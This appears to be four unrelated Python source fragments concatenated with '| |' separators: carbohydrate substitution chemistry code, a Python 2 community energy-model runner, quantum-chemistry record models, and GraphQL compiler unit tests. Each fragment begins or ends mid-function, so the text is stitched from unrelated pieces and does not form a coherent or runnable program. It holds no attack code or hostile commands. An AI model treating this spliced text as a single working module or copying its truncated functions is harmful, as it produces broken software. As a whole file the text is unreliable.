def set_isocarb(self,cnum,iso):
"""
"""
self.modifs[0][cnum-1]=iso
def get_isocarb(self,cnum):
return self.modifs[0][cnum-1]
def rm_carbs(self,carbs):
"""
"""
for cnum in carbs:
self.modifs[1].pop(cnum)
def add_carbs(self,nbcarbs,mods=None):
"""
"""
for icarb in range(nbcarbs):
if mods:
self.modifs[0].append(mods[icarb][0])
self.modifs[1].append(mods[icarb][1])
else:
self.modifs[0].append("")
self.modifs[1].append(SubstitutionLibrary.NOSUBID)
def set_anhydrobond(self,bind):
"""
bind: boolean for now (text like 3,6 can be later)
"""
self.anhydro=bind
def get_endc(self):
return self.ncc+self.startcycle-1
def striso(self):
iso=""
for isocarb in self.modifs[0]:
if isocarb in ["D","L"]:
iso+=isocarb
else:
iso+="-"
return iso
def get_epimer(self):
isotxt=""
endc=self.startcycle+self.ncc-1
# not chiral
if self.nct==self.ncc:
endc-=1
# neuraminic acid as abnormal example ....
if self.nct>6:
endc=self.nct-1
for cnum in range(self.startcycle+1,endc):
iso=self.modifs[0][cnum-1]
if iso in ["D","L"] :
isotxt+=iso
else:
isotxt+="-"
return isotxt
class Substitution:
"""
"""
UKN=0
"""
naming of unreferenced substitution
"""
PATFORM="[A-Z][a-z]?[0-9]{1,2}"
CID=0
"""
numbering of substitution instances (as unique identifier)
"""
def __init__(self,formula,link=None,name=None,smiles=None):
"""
"""
if name==None:
self.name="ukn"+str(Substitution.UKN)
Substitution.UKN+=1
else:
self.name=name
self.identifier=None
self.formula=formula
self.smiles=smiles
self.link=""
if link==None:
if smiles!=None:
self.link=re.match("^=?[A-Z][a-z]?",smiles).group()
elif re.search("O",formula):
self.link="O"
else:
self.link=re.match("^=?[A-Z][a-z]?",re.sub("H[0-9]+","",formula)).group()
else:
self.link=link
# ose carbon + delta
def get_delta(self):
"""
Mass of the formula minus the mass of the replaced OH (and 1H if linkage is on ose C)
:return: the round difference of Dalton mass between OH and elements in the substitution
:rtype: float
"""
delta=self.massSubstitution()
o=Atom.mass("O")
h=Atom.mass("H")
delta=delta-o-h
if re.match("^=",self.smiles):
delta-=h
linkage=self.smiles
while re.match("^\(",linkage):
delta-=h
if re.match("^\(=",self.smiles):
delta-=h
linkage=linkage[linkage.find(")")+1:]
#if re.match("^=",self.link):
#delta-=h
### linkage on carbon not at Oxygen place
## !!!! ne convient pas pour substit=desoxy, cas particulier ou` link=""
## ok si 2 atomes liés au C de l'ose
#if self.link=="" and self.formula!="H1":
## remove an H to the carbon , add the mass of substituent formula minus OH
#delta-=h
return round(delta,3)
def equals(self,compar):
"""
"""
formula_ref=sorted(re.findall("[A-Z][a-z]?[0-9]+",self.formula))
txtref=""
for a in formula_ref:
txtref+=a
return compar==txtref
def massSubstitution(self):
"""
"""
return Substitution.__compute_mass__(self.formula)
def __compute_mass__(formula):
"""
"""
m=0
f=re.findall(Substitution.PATFORM,formula)
for ab in f:
#m+=SubstitutionLibrary.massAtom(re.sub("[0-9]","",ab))*int(re.sub("[a-zA-Z]","",ab))
m+=Atom.mass(re.sub("[0-9]","",ab))*int(re.sub("[a-zA-Z]","",ab))
return m
class SubstitutionLibrary:
"""
"""
SUBSTITUTIONS=[]
"""
store the list of substitutions
"""
NOSUBID=0
"""
store the identifier of no substitution (OH on carbon)
"""
def __init__(self):
"""
"""
#name,formula,linkage,smiles=None
SubstitutionLibrary.create_substit("oxydation","O2H1","","(=O)O")
#SubstitutionLibrary.create_substit("keto","C1O2H4","","(CO)O")
SubstitutionLibrary.create_substit("desoxy","H1","","")
SubstitutionLibrary.create_substit("double_bond","O1",None,"=O")
SubstitutionLibrary.create_substit("ferulic_acid","C10H9O4","O","OC(=O)C=CC1=CC=C(O)C(OC)=C1")
def sort_by_name():
"""
Sort the list of substitutions according to their name
"""
SubstitutionLibrary.SUBSTITUTIONS=sorted(SubstitutionLibrary.SUBSTITUTIONS,key=lambda s:s.name)
@staticmethod
def get_data():
"""
"""
data=[]
for s in SubstitutionLibrary.SUBSTITUTIONS:
data.append({"identifier":s.identifier,"name":s.name,"formula":s.formula,"link":s.link,"smiles":s.smiles,"mass":s.massSubstitution()})
return data
def to_json():
non=["oxydation","keto","desoxy","double_bond","ferulic_acid"]
data={}
for s in SubstitutionLibrary.SUBSTITUTIONS:
if s.name not in non:
data[s.name]={"formula":s.formula,"smiles": s.smiles}
return json.dumps(data)
def create_substit(name,formula,link,smiles=None):
"""
:return: a new substitution if formula not found in internal ressource
"""
query= SubstitutionLibrary.get_subformul(formula)
if not query:
substit=Substitution(formula,link,name,smiles)
SubstitutionLibrary.add_substit(substit)
return substit
elif link!=query.link:
substit=Substitution(formula,link,name,smiles)
SubstitutionLibrary.add_substit(substit)
return substit
else:
return query
def add_substit(substit):
"""
add the substitution object to the internal catalog
"""
SubstitutionLibrary.SUBSTITUTIONS.append(substit)
Substitution.CID+=1
substit.identifier=Substitution.CID
@staticmethod
def get_subname(identifier):
"""
:param identifier: indification number
:type: int
:return: the substituent name according to the identifier
:rtype: string
"""
s=SubstitutionLibrary.getSub(identifier)
if s:
return s.name
Logger.debug("identifier not found: %i"%identifier,1)
return ""
def get_subfromname(name):
"""
:rtype: Substitution
"""
for s in SubstitutionLibrary.SUBSTITUTIONS:
if s.name.lower()==name.lower():
return s
return None
@staticmethod
def get_subformul(formula):
"""
"""
for s in SubstitutionLibrary.SUBSTITUTIONS:
if sorted(s.formula)==sorted(formula):
return s
return None
def mod_id(**kwargs):
"""
"""
for modsub in SubstitutionLibrary.SUBSTITUTIONS:
if modsub.identifier==int(kwargs["identifier"]):
modsub.name=kwargs["name"]
modsub.formula=kwargs["formula"]
modsub.smiles=kwargs["smiles"]
modsub.link=kwargs["linkage"]
def rm_id(identifier):
"""
"""
matchsub=None
for substit in SubstitutionLibrary.SUBSTITUTIONS:
if substit.identifier==identifier:
matchsub=substit
if matchsub:
SubstitutionLibrary.SUBSTITUTIONS.remove(matchsub)
def check_smiles(identifier):
"""
"""
substit=SubstitutionLibrary.getSub(identifier)
if substit!=None:
smiles=substit.smiles
compo=substit.formula
if smiles=="" and compo!="H1":
return False
if smiles=="O" and compo not in ["O1H1","H1O1"]:
return False
if smiles=="=":
| |
directory = os.path.join(self.model_root, 'results' + tag)
try:
os.makedirs(os.path.join(directory))
except OSError:
pass
results = {}
picklename = os.path.join(directory,'binary_results.pkl')
with open(picklename, 'rb') as pkl:
while True:
try:
temp = pickle.load(pkl)
key = temp[0]
i = 0
while key in results.keys():
key = key.split(' #')[0] + ' #' + str(i)
i += 1
results[key] = temp[1]
except:
break
return results
def run (self, community_config, global_config = None,
tag = '', scalers = None, alt_save_name = None):
"""
run the model for a community
inputs:
community: the community <string>
c_config: (optional, default: none) alternate community config
file <string>
g_config: (optional, default: none) alternat global confing
file <string>
tag: (optional) tag for results dir <string>
outputs:
the model is run for a community/project/assigned 'name'
preconditions:
see invariants
postconditions:
None
"""
#~ print community_config
if scalers is None:
scalers = default_scalers
#~ if name is None:
#~ name = community
temp = tag
#~ if img_dir is None:
#~ if temp != '':
#~ temp = '_' + tag
#~ img_dir = os.path.join(self.model_root, 'results' + temp, 'plots')
#~ cd, fc, diag = self.setup_community(community, i_dir, c_config,
#~ g_config, c_mult, scalers)
diagnostics = Diagnostics()
community_data = CommunityData(
community_config,
global_config,
diagnostics,
scalers
)
name = community_data.get_item('community', 'file id')
#~ print name
forecast = Forecast(community_data, diagnostics, scalers)
comps_used = self.run_components(
community_data,
forecast,
diagnostics,
scalers
)
#~ name = community_data.get_item('community', 'file id')
self.save_components_output(comps_used, name, forecast, tag,
alt_name=alt_save_name)
#~ self.save_forecast_output(forecast, name, img_dir, plot, tag)
self.save_input_files(community_data, name, tag, alt_name=alt_save_name)
self.save_diagnostics(diagnostics, name, tag, alt_name=alt_save_name)
comps_used['community data'] = community_data
comps_used['forecast'] = forecast
#~ print name
#~ print 'rb', alt_save_name
self.store_results(comps_used, tag, name=alt_save_name)
def run_many (self, directory):
"""
run a list of communities using default options
inputs:
communities: a list of communities <list>
"""
communities = \
[f for f in os.listdir( directory ) \
if f.endswith('.yaml') or f.endswith('.yml')]
for c in communities:
try:
self.run(os.path.join(directory,c))
except (RuntimeError, IOError) as e:
print '------------------------'
print e
msg = "RUN ERROR: "+ c + \
" not a configured community/project"
print msg
print '------------------------'
def run_script(self):
"""
TODO move code to run a script from cli
"""
pass
def save_metadata (self, tag = ""):
"""
save model metadata
inputs:
tag: (optional) tag for results dir <string>
outputs:
saves version_metadata.txt
preconditions:
see invariants
postconditions:
None
"""
if tag != '':
tag = '_' + tag
directory = os.path.join(self.model_root, 'results' + tag)
try:
os.makedirs(os.path.join(directory))
except OSError:
pass
with open(os.path.join(directory, "version_metadata.txt"), 'w') as fd:
ts = datetime.strftime(datetime.now(), "%Y-%m-%d")
fd.write(("Code Version: " + __version__ + "\n"
"Code URL: " + __download_url__ + "\n"
"Date Run: " + ts + '\n' ))
def save_summaries (self, tag = ''):
"""
save the summaries for the communities in a results directories
binary results file
inputs:
tag: (optional) tag for results dir <string>
outputs:
sumamry files are saved
preconditions:
see invariants
postconditions:
None
"""
res = self.load_results(tag)
#~ print res
if tag != '':
tag = '_' + tag
directory = os.path.join(self.model_root, 'results' + tag)
try:
os.makedirs(os.path.join(directory))
except OSError:
pass
summaries.village_log(res,directory)
summaries.building_log(res,directory)
summaries.fuel_oil_log(res,directory)
summaries.forecast_comparison_log(res,directory)
summaries.electric_price_summary(res,directory)
summaries.call_comp_summaries(res,directory)
class Setup (object):
"""
setup the structure needed to run the model
class invariants:
self.model_root: is the model root path <string>
self.communities: list of communities to setup <string>
self.data_repo: path data repo <string>
self.tag: tag used a the directory to setup the model in
model_root <string>
"""
def __init__ (self, model_root, data_dir, communities = None, tag = None):
"""
initilizer
inputs:
model_root: model root path <string>
communities: list of communities to setup <string>
data_repo: path to data repo <sting>
tag: (optional) tag to use as self.tag setup sub directory,
if not provided self.tag will be m<version>_d<version> <string>
postconditions:
see invatiants
"""
self.model_root = model_root
self.communities = communities
self.data_dir = data_dir
self.tag = tag
if tag is None:
self.tag = self.make_version_tag()
self.diagnostics = Diagnostics()
def make_version_tag (self):
"""
generate a version tag
precondition:
see invariants
'VERSION' file must exist in repo
outputs
returns tag
"""
data_version_file = os.path.join(self.data_dir, 'VERSION')
with open(data_version_file, 'r') as fd:
ver = fd.read().replace("\n", "")
ver = 'm' + __version__ + '_d' + ver
return ver
def setup_directories (self):
"""
setup the directories
preconditions:
see invariats
postconditions:
config and input_files are removed and then
config and input_files directories are created.
"""
setup_path = os.path.join(self.model_root, self.tag)
try:
shutil.rmtree(os.path.join(setup_path, "config"))
except OSError:
pass
os.makedirs(os.path.join(setup_path, "config"))
def setup_community_list (self):
"""
create the community list file from the repo
preconditions:
see invariants, community_list.csv sould exist in data repo
postcondition:
'__community_list.csv' saved in config directory
"""
config_path = os.path.join(self.model_root, self.tag, 'config',
'__community_list.csv')
src_path = os.path.join(self.data_dir, 'community_list.csv')
shutil.copy(src_path, config_path)
def write_preprocessor_metadata (self, save_path):
"""
write data metadata
inputs:
input_path: path to inputs directory <string>
outputs:
saves 'input_files_metadata.yaml' in "__metadata" subdirectory
"""
data_version_file = os.path.join(self.data_dir, 'VERSION')
with open(data_version_file, 'r') as fd:
ver = fd.read().replace("\n", "")
md_dir = os.path.join(save_path, "__metadata")
try:
os.makedirs(md_dir)
except OSError:
pass
#~ try:
#~ os.makedirs(os.path.join(md_dir,'diagnostic_files'))
#~ except OSError:
#~ pass
m = 'w'
with open(
os.path.join(md_dir, 'preprocessor_metadata.yaml'),
m) as meta:
meta.write(yaml.dump({'upadted': datetime.strftime(datetime.now(),
"%Y-%m-%d %H:%M:%S"),
'data version': ver},
default_flow_style = False))
self.diagnostics.save_messages(os.path.join(md_dir, 'log.csv'))
data_version_file = os.path.join(self.data_dir, 'VERSION')
with open(data_version_file, 'r') as fd:
ver = fd.read().replace("\n", "")
z = zipfile.ZipFile(os.path.join(md_dir, "raw_data.zip"),"w")
for raw in [f for f in os.listdir(self.data_dir) if '.csv' in f]:
z.write(os.path.join(self.data_dir,raw), raw)
z.write(os.path.join(data_version_file), 'VERSION')
def load_communities (self):
""" Function doc """
data = read_csv(os.path.join(self.model_root, self.tag, 'config',
'__community_list.csv'))
self.communities = [c for c in data['Community'].values]
def setup (self, force = False, ng_coms = [], make_globals = False):
"""
run the setup functionality
inputs:
force: (optional) overwrirte existing files <boolean>
outputs:
model structure is setup
"""
setup_path = os.path.join(self.model_root, self.tag)
if os.path.exists(setup_path) and force == False:
return False
self.setup_directories()
self.setup_community_list()
if self.communities is None:
self.load_communities()
f_path = os.path.join(self.model_root, self.tag, 'config')
for community in self.communities:
#~ print community
#~ f_path = os.path.join(self.model_root, self.tag, 'config')
preprocessor = Preprocessor(community,
self.data_dir,
diag = self.diagnostics,
process_intertie = False)
self.diagnostics.add_note('Preprocessing ' + community, '---------')
if community in ng_coms:
preprocessor.run(show=True, ng_com=True)
else:
preprocessor.run(show=True)
if make_globals:
keys_to_split = KEYS_FOR_GLOBAL
preprocessor.save_config(f_path, keys_to_split)
f_name = os.path.join(f_path, '__global_config.yaml')
if not os.path.exists(f_name):
preprocessor.save_global_congfig(f_name, keys_to_split)
else:
preprocessor.save_config(f_path)
## the intertie, if it exists
try:
preprocessor = Preprocessor(community,
self.data_dir,
diag = self.diagnostics,
process_intertie = True)
self.diagnostics.add_note('Preprocessing ' + community,
'---------')
preprocessor.run(show=True)
if make_globals:
keys_to_split = KEYS_FOR_GLOBAL
preprocessor.save_config(f_path, keys_to_split)
else:
preprocessor.save_config(f_path)
except PreprocessorError:
pass
#~ self.setup_global_config()
#~ ids = self.setup_input_files()
#~ self.setup_community_configs()
#~ self.setup_construction_multipliers()
#~ self.setup_goals()
self.write_preprocessor_metadata(f_path)
return True
def script_validator (script_file):
"""
validate a script(very basic), will raise a standard error if a problem
is found
inputs:
script file: a script file
outputs:
retuns a validated script to use to run the model
"""
extns = ['yaml','yml']
with open(script_file, 'r') as sf:
script = yaml.load(sf)
try:
root = script['global']['root']
except KeyError:
raise StandardError, "No root provided for model structure"
try:
gcfg = script['global']['global config']
if not os.path.isfile(gcfg) and \
not os.path.split(gcfg)[1].split('.')[1] in extns:
raise StandardError, "golbal config not a yaml file"
except KeyError:
script['global']['global config'] = None
if script['global']['global config'] is None:
gc = os.path.join(root, 'config', '__global_config.yaml')
if os.path.isfile(gc):
script['global']['global config'] = gc
try:
res_tag = script['global']['results tag']
except KeyError:
script['global']['results tag'] = ''
res_tag = ''
errors = []
all_coms = set()
for com in script['communities']:
community = com['community'].replace(' ','_')
try:
com['ID']
except KeyError:
com['ID'] = None
if com['ID'] is None:
com['ID'] = com['community']
| |
import abc
import copy
import datetime
import json
from enum import Enum
from typing import Any, Dict, Optional, Set
import qcelemental as qcel
from pydantic import Field, validator
from qcelemental.models.results import AtomicResultProtocols
from ..outputstore import OutputStore
from ..records.models import RecordStatusEnum
# from ...interface.models import ObjectId, ProtoModel
ObjectId = int
from qcelemental.models import ProtoModel
class DriverEnum(str, Enum):
"""
The type of calculation that is being performed (e.g., energy, gradient, Hessian, ...).
"""
energy = "energy"
gradient = "gradient"
hessian = "hessian"
properties = "properties"
class QCSpecification(ProtoModel):
"""
The quantum chemistry metadata specification for individual computations such as energy, gradient, and Hessians.
"""
driver: DriverEnum = Field(..., description=str(DriverEnum.__doc__))
method: str = Field(..., description="The quantum chemistry method to evaluate (e.g., B3LYP, PBE, ...).")
basis: Optional[str] = Field(
None,
description="The quantum chemistry basis set to evaluate (e.g., 6-31g, cc-pVDZ, ...). Can be ``None`` for "
"methods without basis sets.",
)
keywords: Optional[ObjectId] = Field(
None,
description="The Id of the :class:`KeywordSet` registered in the database to run this calculation with. This "
"Id must exist in the database.",
)
protocols: Optional[AtomicResultProtocols] = Field(
AtomicResultProtocols(), description=str(AtomicResultProtocols.__base_doc__)
)
program: str = Field(
...,
description="The quantum chemistry program to evaluate the computation with. Not all quantum chemistry programs"
" support all combinations of driver/method/basis.",
)
def dict(self, *args, **kwargs):
ret = super().dict(*args, **kwargs)
# Maintain hash compatability
if len(ret["protocols"]) == 0:
ret.pop("protocols", None)
return ret
@validator("basis")
def _check_basis(cls, v):
return prepare_basis(v)
@validator("program")
def _check_program(cls, v):
return v.lower()
@validator("method")
def _check_method(cls, v):
return v.lower()
class Record(abc.ABC):
_type = "record"
_SpecModel = QCSpecification
class _DataModel(ProtoModel):
# Classdata
# NOTE: do we want to change how these work?
_hash_indices: Set[str]
# Base identification
id: ObjectId = Field(
None, description="Id of the object on the database. This is assigned automatically by the database."
)
hash_index: Optional[str] = Field(
None, description="Hash of this object used to detect duplication and collisions in the database."
)
procedure: str = Field(..., description="Name of the procedure which this Record targets.")
program: str = Field(
...,
description="The quantum chemistry program used for individual quantum chemistry calculations.",
)
version: int = Field(..., description="The version of this record object.")
protocols: Optional[Dict[str, Any]] = Field(
None, description="Protocols that change the data stored in top level fields."
)
# Extra fields
extras: Dict[str, Any] = Field({}, description="Extra information to associate with this record.")
stdout: Optional[ObjectId] = Field(
None,
description="The Id of the stdout data stored in the database which was used to generate this record from the "
"various programs which were called in the process.",
)
stdout_obj: Optional[OutputStore] = Field(
None,
description="The full stdout data stored in the database which was used to generate this record from the "
"various programs which were called in the process.",
)
stderr: Optional[ObjectId] = Field(
None,
description="The Id of the stderr data stored in the database which was used to generate this record from the "
"various programs which were called in the process.",
)
stderr_obj: Optional[OutputStore] = Field(
None,
description="The full stderr data stored in the database which was used to generate this record from the "
"various programs which were called in the process.",
)
error: Optional[ObjectId] = Field(
None,
description="The Id of the error data stored in the database in the event that an error was generated in the "
"process of carrying out the process this record targets. If no errors were raised, this field "
"will be empty.",
)
error_obj: Optional[OutputStore] = Field(
None,
description="The full error output stored in the database which was used to generate this record from the "
"various programs which were called in the process.",
)
# Compute status
manager_name: Optional[str] = Field(None, description="Name of the Queue Manager which generated this record.")
status: RecordStatusEnum = Field(..., description=str(RecordStatusEnum.__doc__))
modified_on: datetime.datetime = Field(
None, description="Last time the data this record points to was modified."
)
created_on: datetime.datetime = Field(
None, description="Time the data this record points to was first created."
)
# Carry-ons
provenance: Optional[qcel.models.Provenance] = Field(
None,
description="Provenance information tied to the creation of this record. This includes things such as every "
"program which was involved in generating the data for this record.",
)
def __init__(self, client: Optional["PortalClient"] = None, **kwargs: Any):
"""
Parameters
----------
client : PortalClient, optional
A PortalClient connected to a server.
**kwargs : Dict[str, Any]
Additional keywords passed to the Record and the initial data constructor.
"""
self._client = client
# Create the data model
self._data = self._DataModel(**kwargs)
def __repr__(self):
fields = [f"{key}={value}" for key, value in self.__repr_args__()]
return f"{self.__class__.__name__}({', '.join(fields)})"
def __repr_args__(self):
return [("id", f"{self.id}"), ("status", f"{self.status}")]
@classmethod
def from_dict(cls, data: Dict[str, Any], client: Optional["PortalClient"] = None) -> "Record":
"""Creates a new Record instance from a dict representation.
Allows roundtrips from `Collection.to_dict`.
Parameters
----------
data : Dict[str, Any]
A dict to create a new Record instance from.
client : PortalClient, optional
A PortalClient connected to a server.
Returns
-------
Record
A Record instance.
"""
class_name = cls.__name__.lower()
# Check we are building the correct object
record_type = cls._type
if "procedure" not in data:
raise KeyError("Attempted to create Record from data, but no `procedure` field found.")
if data["procedure"].lower() != record_type:
raise KeyError(
"Attempted to create Record from data with class {}, but found record type of {}.".format(
class_name, data["procedure"].lower()
)
)
# Allow PyDantic to handle type validation
ret = cls(client=client, **data)
return ret
@classmethod
def from_json(
cls, *, jsondata: Optional[str] = None, filename: Optional[str] = None, client: Optional["PortalClient"] = None
) -> "Record":
"""Creates a new Record instance from a JSON string.
Allows roundtrips from `Record.to_json`.
One of `jsondata` or `filename` must be provided.
Parameters
----------
jsondata : str, Optional, Default: None
The JSON string to create a new Record instance from.
filename : str, Optional, Default: None
The filename to read JSON data from.
client : PortalClient, optional
A PortalClient connected to a server.
Returns
-------
Record
A Record instance.
"""
if (jsondata is not None) and (filename is not None):
raise ValueError("One of `jsondata` or `filename` must be specified, not both")
if jsondata is not None:
data = json.loads(jsondata)
elif filename is not None:
with open(filename, "r") as jsonfile:
data = json.load(jsonfile)
else:
raise ValueError("One of `jsondata` or `filename` must be specified")
return cls.from_dict(data, client=client)
def to_dict(self) -> dict:
"""Returns a copy of the current Record data as a Python dict.
Returns
-------
ret : dict
A Python dict representation of the Record data.
"""
datadict = self._data.dict()
return copy.deepcopy(datadict)
# alias for to_json, for duck-typing parity with pydantic
dict = to_dict
def to_json(self, filename: Optional[str] = None) -> str:
"""Returns the current Record data as JSON.
If a filename is provided, dumps JSON to file.
Otherwise returns data as a JSON string.
Parameters
----------
filename : str, Optional, Default: None
The filename to write JSON data to.
Returns
-------
ret : dict
If `filename=None`, a JSON representation of the Record.
Otherwise `None`.
"""
jsondata = self._data.json()
if filename is not None:
with open(filename, "w") as open_file:
open_file.write(jsondata)
else:
return jsondata
# alias for to_json, for duck-typing parity with pydantic
json = to_json
@property
def status(self):
"""Status of the calculation corresponding to this record."""
return self._data.status.value if self._data.status else None
@property
def id(self):
return self._data.id
@property
def spec(self):
"""Includes keywords."""
# example
# TODO: need to change `_DataModel` above to accommodate usage like this
self._SpecModel(**self._data.spec)
@property
def task(self):
# will need to handle case of task key being present or not
pass
def _outputstore_get(self, field_name):
oid = self._data.__dict__[field_name]
if oid is None:
return None
print("{} : '{}' || {}".format(self.__class__.__name__, self.id, self._client.address))
result = self._client._get_outputs(oid)
if field_name == "error":
return result.as_json
else:
return result.as_string
@property
def stdout(self):
"""The STDOUT contents for this record, if it exists."""
if self._data.stdout_obj is not None:
return self._data.stdout_obj
else:
return self._outputstore_get("stdout")
@property
def stderr(self):
"""The STDERR contents for this record, if it exists."""
return self._outputstore_get("stderr")
@property
def error(self):
"""The error traceback contents for this record, if it exists."""
return | |
expressions.OutputContextField(
child_location.navigate_to_field('name'), GraphQLString),
}),
]
expected_location_types = {
base_location: 'Animal',
child_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_has_edge_degree_op_filter_with_optional(self):
test_data = test_input_data.has_edge_degree_op_filter_with_optional()
base_location = helpers.Location(('Species',))
animal_location = base_location.navigate_to_subpath('in_Animal_OfSpecies')
child_location = animal_location.navigate_to_subpath('out_Animal_ParentOf')
revisited_animal_location = animal_location.revisit()
expected_blocks = [
blocks.QueryRoot({'Species'}),
blocks.MarkLocation(base_location),
blocks.Traverse('in', 'Animal_OfSpecies'),
blocks.Filter(
expressions.BinaryComposition(
u'||',
expressions.BinaryComposition( # the zero-edge check
u'&&',
expressions.BinaryComposition(
u'=',
expressions.Variable('$child_count', GraphQLInt),
expressions.ZeroLiteral
),
expressions.BinaryComposition(
u'=',
expressions.LocalField('out_Animal_ParentOf'),
expressions.NullLiteral
)
),
expressions.BinaryComposition( # the non-zero-edge check
u'&&',
expressions.BinaryComposition(
u'!=',
expressions.LocalField('out_Animal_ParentOf'),
expressions.NullLiteral
),
expressions.BinaryComposition(
u'=',
expressions.UnaryTransformation(
u'size',
expressions.LocalField('out_Animal_ParentOf')
),
expressions.Variable('$child_count', GraphQLInt),
)
)
)
),
blocks.MarkLocation(animal_location),
blocks.Traverse('out', 'Animal_ParentOf', optional=True),
blocks.MarkLocation(child_location),
blocks.EndOptional(),
blocks.Backtrack(animal_location, optional=True),
blocks.MarkLocation(revisited_animal_location),
blocks.Backtrack(base_location),
blocks.ConstructResult({
'species_name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'parent_name': expressions.OutputContextField(
animal_location.navigate_to_field('name'), GraphQLString),
'child_name': expressions.TernaryConditional(
expressions.ContextFieldExistence(child_location),
expressions.OutputContextField(
child_location.navigate_to_field('name'), GraphQLString),
expressions.NullLiteral),
}),
]
expected_location_types = {
base_location: 'Species',
animal_location: 'Animal',
child_location: 'Animal',
revisited_animal_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_has_edge_degree_op_filter_with_fold(self):
test_data = test_input_data.has_edge_degree_op_filter_with_fold()
base_location = helpers.Location(('Species',))
animal_location = base_location.navigate_to_subpath('in_Animal_OfSpecies')
animal_fold = helpers.FoldScopeLocation(animal_location, ('out', 'Animal_ParentOf'))
expected_blocks = [
blocks.QueryRoot({'Species'}),
blocks.MarkLocation(base_location),
blocks.Traverse('in', 'Animal_OfSpecies'),
blocks.Filter(
expressions.BinaryComposition(
u'||',
expressions.BinaryComposition( # the zero-edge check
u'&&',
expressions.BinaryComposition(
u'=',
expressions.Variable('$child_count', GraphQLInt),
expressions.ZeroLiteral
),
expressions.BinaryComposition(
u'=',
expressions.LocalField('out_Animal_ParentOf'),
expressions.NullLiteral
)
),
expressions.BinaryComposition( # the non-zero-edge check
u'&&',
expressions.BinaryComposition(
u'!=',
expressions.LocalField('out_Animal_ParentOf'),
expressions.NullLiteral
),
expressions.BinaryComposition(
u'=',
expressions.UnaryTransformation(
u'size',
expressions.LocalField('out_Animal_ParentOf')
),
expressions.Variable('$child_count', GraphQLInt),
)
)
)
),
blocks.MarkLocation(animal_location),
blocks.Fold(animal_fold),
blocks.Unfold(),
blocks.Backtrack(base_location),
blocks.ConstructResult({
'species_name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'parent_name': expressions.OutputContextField(
animal_location.navigate_to_field('name'), GraphQLString),
'child_names': expressions.FoldedOutputContextField(
animal_fold, 'name', GraphQLList(GraphQLString)),
}),
]
expected_location_types = {
base_location: 'Species',
animal_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_fold_on_output_variable(self):
test_data = test_input_data.fold_on_output_variable()
base_location = helpers.Location(('Animal',))
base_fold = helpers.FoldScopeLocation(base_location, ('out', 'Animal_ParentOf'))
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(base_fold),
blocks.Unfold(),
blocks.ConstructResult({
'animal_name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'child_names_list': expressions.FoldedOutputContextField(
base_fold, 'name', GraphQLList(GraphQLString)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_fold_after_traverse(self):
test_data = test_input_data.fold_after_traverse()
base_location = helpers.Location(('Animal',))
parent_location = base_location.navigate_to_subpath('in_Animal_ParentOf')
parent_fold = helpers.FoldScopeLocation(parent_location, ('out', 'Animal_ParentOf'))
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Traverse('in', 'Animal_ParentOf'),
blocks.MarkLocation(parent_location),
blocks.Fold(parent_fold),
blocks.Unfold(),
blocks.Backtrack(base_location),
blocks.ConstructResult({
'animal_name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'sibling_and_self_names_list': expressions.FoldedOutputContextField(
parent_fold, 'name', GraphQLList(GraphQLString)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
parent_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_fold_and_traverse(self):
test_data = test_input_data.fold_and_traverse()
base_location = helpers.Location(('Animal',))
parent_fold = helpers.FoldScopeLocation(base_location, ('in', 'Animal_ParentOf'))
parent_location = base_location.navigate_to_subpath('in_Animal_ParentOf')
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(parent_fold),
blocks.Traverse('out', 'Animal_ParentOf'),
blocks.Backtrack(parent_location),
blocks.Unfold(),
blocks.ConstructResult({
'animal_name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'sibling_and_self_names_list': expressions.FoldedOutputContextField(
parent_fold, 'name', GraphQLList(GraphQLString)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_fold_and_deep_traverse(self):
test_data = test_input_data.fold_and_deep_traverse()
base_location = helpers.Location(('Animal',))
parent_fold = helpers.FoldScopeLocation(base_location, ('in', 'Animal_ParentOf'))
parent_location = base_location.navigate_to_subpath('in_Animal_ParentOf')
sibling_location = parent_location.navigate_to_subpath('out_Animal_ParentOf')
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Fold(parent_fold),
blocks.Traverse('out', 'Animal_ParentOf'),
blocks.Traverse('out', 'Animal_OfSpecies'),
blocks.Backtrack(sibling_location),
blocks.Backtrack(parent_location),
blocks.Unfold(),
blocks.ConstructResult({
'animal_name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
'sibling_and_self_species_list': expressions.FoldedOutputContextField(
parent_fold, 'name', GraphQLList(GraphQLString)),
}),
]
expected_location_types = {
# No MarkLocation blocks are output within folded scopes.
base_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
def test_traverse_and_fold_and_traverse(self):
test_data = test_input_data.traverse_and_fold_and_traverse()
base_location = helpers.Location(('Animal',))
parent_location = base_location.navigate_to_subpath('in_Animal_ParentOf')
sibling_fold = helpers.FoldScopeLocation(parent_location, ('out', 'Animal_ParentOf'))
sibling_location = parent_location.navigate_to_subpath('out_Animal_ParentOf')
expected_blocks = [
blocks.QueryRoot({'Animal'}),
blocks.MarkLocation(base_location),
blocks.Traverse('in', 'Animal_ParentOf'),
blocks.MarkLocation(parent_location),
blocks.Fold(sibling_fold),
blocks.Traverse('out', 'Animal_OfSpecies'),
blocks.Backtrack(sibling_location),
blocks.Unfold(),
blocks.Backtrack(base_location),
blocks.ConstructResult({
'animal_name': expressions.OutputContextField(
base_location.navigate_to_field('name'), GraphQLString),
